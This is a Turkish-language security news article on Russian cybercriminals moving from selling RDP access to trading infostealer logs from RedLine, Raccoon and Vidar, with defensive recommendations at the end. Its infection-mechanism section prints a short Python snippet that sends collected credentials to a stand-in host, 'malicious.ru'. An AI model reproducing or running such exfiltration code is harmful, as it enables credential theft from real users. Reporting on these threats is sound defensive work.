Rusya siber suç ekosisteminde yeni bir evrim yaşanıyor: piyasa operatörleri ve tehdit aktörleri, tehlikeye atılmış Uzak Masaüstü Protokolü (RDP) erişimini satmaktan, yetkisiz sistem girişi için kötü amaçlı yazılım hırsızı günlüklerinin ticaretine hızla geçiş yapıyor.
Bu geçiş, dünya çapındaki kuruluşları ve bireyleri etkileyen, yeraltı forumlarındaki hem taktiklerde hem de etkide önemli bir değişikliğe işaret ediyor.
Tarihsel olarak, RDP erişim satışları Rus siber suç pazarlarına hakim oldu ve tehdit aktörlerine kurumsal ve hükümet ağlarına doğrudan giriş olanağı sağladı. Ancak RedLine, Raccoon ve Vidar gibi gelişmiş hırsızlığa yönelik kötü amaçlı yazılımların ortaya çıkışı yasa dışı ticareti dönüştürdü.
Suçlular artık statik kimlik bilgileri satmak yerine “günlükleri” topluyor ve aracılık ediyor: tarayıcıda kayıtlı parolalar, çerezler, otomatik doldurma verileri, kripto cüzdan ayrıntıları ve oturum belirteçleri içeren kötü amaçlı yazılım bulaşmalarından elde edilen ham çıktılar.
.webp)
Sızan bu günlükler, bazen geleneksel RDP satışlarından daha fazla erişim ve gizlilikle, hedeflenen ortamlara fırsatçı erişime olanak tanır.
Rapid7 araştırmacıları bu değişimi gözlemledi ve hırsız-günlük paketlerinin önde gelen Rus forumlarında sıklıkla göründüğünü vurguladı; bu paketler genellikle kimlik bilgilerinin çıkarılmasını ve kullanılmasını kolaylaştırmak için otomatik komut dosyalarıyla birlikte sunuluyor.
Bu paradigma, saldırganlara ağ düzeyindeki kontrolleri atlama ve çeşitli platformlarda anında kurbanların kimliğine bürünme olanağı vererek hızlı hesap ele geçirme ve veri hırsızlığı riskini artırır.
.webp)
Hırsız günlük ticaretinde bulunan ölçek ve otomasyon, geleneksel güvenlik önlemlerini derinden zorluyor: Günlükler yayınlanır yayınlanmaz, çok çeşitli suçlular verileri paraya çevirmek veya daha fazla silah haline getirmek için yarışıyor.
Enfeksiyon Mekanizması
Modern hırsız kötü amaçlı yazılımlar olağanüstü bir verimlilikle çalışır. Genellikle kimlik avı kampanyaları, zehirli yazılım indirmeleri veya kötü amaçlı reklamlar yoluyla dağıtıldıktan sonra yürütülebilir dosya, tarayıcılarda ve masaüstü uygulamalarında saklanan kimlik bilgilerini, çerezleri ve cüzdanları anında tarar.
Çalıcı, çalışma süresi boyunca süreç enjeksiyonunu ve API çağrılarını (özellikle tarayıcının SQLite veritabanlarına erişme ve kimlik bilgisi depolarını okuma) kullanır.
Tipik bir sızma kod bloğu şunları içerir: –
import requests
log_data = collect_credentials()
requests.post('http://malicious.ru/upload', data=log_data)Kalıcılık taktikleri minimum düzeydedir; saldırganlar kısa süreli bulaşmaya ve hızlı bir şekilde çıkarmaya odaklanır, bazen tespitten kaçınmak için günlük topladıktan sonra kötü amaçlı yazılımı kaldırır.
Ele geçirilen kullanıcının güvenlik araçları hırsızı tespit ettiğinde, kimlik bilgileri çoğunlukla zaten forumlarda yayınlanmış oluyor ve bu da hesabın kurtarılmasını zorlaştırıyor.
Siber savunucuların, Rus siber suçluların benimsediği bu çok yönlü ve ölçeklenebilir modele karşı koymak için gerçek zamanlı günlük izleme, çok faktörlü kimlik doğrulama ve olaylara hızlı müdahaleye yönelmesi gerekiyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
